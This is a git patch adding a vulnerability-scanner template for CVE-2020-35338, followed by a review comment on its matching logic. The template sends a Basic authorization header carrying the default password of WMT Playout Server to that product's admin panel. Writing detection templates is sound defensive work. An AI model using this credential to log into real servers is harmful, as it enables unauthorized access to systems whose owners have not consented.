From 5b598fb2910ba440eb470441ad0883ee73689e18 Mon Sep 17 00:00:00 2001
From: jeyaseelan8 <45196752+jeyaseelan8@users.noreply.github.com>
Date: Wed, 21 Apr 2021 21:05:47 +0530
Subject: [PATCH 1/2] Add files via upload
---
 cves/2020/CVE-2020-35338.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/2020/CVE-2020-35338.yaml
diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml
new file mode 100644
index 0000000000..59948f37d2
--- /dev/null
+++ b/cves/2020/CVE-2020-35338.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-35338
+info:
+ author: "Jeya Seelan"
+ description: "Default Credentials to Unauthorised Remote Access of Internal Panel of WMT Server"
+ name: "Default Credentials of WMT Server"
+ reference:
+ - "https://nvd.nist.gov/vuln/detail/CVE-2020-35338"
+ - "https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa"
+ severity: critical
+ tags: "cve,cve2020,wmt,defaultcredentials"
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/server/"
+ headers:
+ Authorization: "Basic OnBva29u"
+ matchers:
+ -
+ part: body
+ type: word
+ words:
+ - "WMT Server playout"
+ -
+ status:
+ - 200
+ type: status
+
From 0e2a270a11efb86c409b723bf17cdcc6b6dea7b8 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Wed, 21 Apr 2021 22:08:46 +0530
Subject: [PATCH 2/2] minor update
---
 cves/2020/CVE-2020-35338.yaml | 31 ++++++++++++++++---------------
 1 file changed, 16 insertions(+), 15 deletions(-)
diff --git a/cves/2020/CVE-2020-35338.yaml b/cves/2020/CVE-2020-35338.yaml
index 59948f37d2..2470e2c195 100644
--- a/cves/2020/CVE-2020-35338.yaml
+++ b/cves/2020/CVE-2020-35338.yaml
@@ -1,27 +1,28 @@
 id: CVE-2020-35338
+
 info:
- author: "Jeya Seelan"
- description: "Default Credentials to Unauthorised Remote Access of Internal Panel of WMT Server"
- name: "Default Credentials of WMT Server"
- reference:
- - "https://nvd.nist.gov/vuln/detail/CVE-2020-35338"
- - "https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa"
+ author: Jeya Seelan
 severity: critical
- tags: "cve,cve2020,wmt,defaultcredentials"
+ name: Default Credentials of WMT Server
+ description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35338
+ - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
+ tags: cve,cve2020,wmt,default-login
+
 requests:
 - method: GET
 path:
 - "{{BaseURL}}/server/"
 headers:
 Authorization: "Basic OnBva29u"
+
+ matchers-condition: and
 matchers:
- -
- part: body
- type: word
- words:
- - "<title>WMT Server playout"
- -
+ - type: status
 status:
 - 200
- type: status
-
+
+ - type: word
+ words:
+ - "<title>WMT Server playout"
\ No newline at end of file
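Review bot: The two matchers joined by `matchers-condition: and` only establish that `/server/` answered 200 with the `<title>WMT Server playout` string; nothing in the request block shows that the `Authorization` header is what granted access. A host that serves the same page without authentication would therefore be reported as a critical default-login finding. I would pair the request with a control request sent without the header and require that it is rejected, or match on text that is rendered only after a successful login, if the product has such a marker. A comment above the header, `# base64 of ":pokon" (empty user name, default password named in the description)`, would save the next maintainer from decoding the value. The new file also ends without a trailing newline.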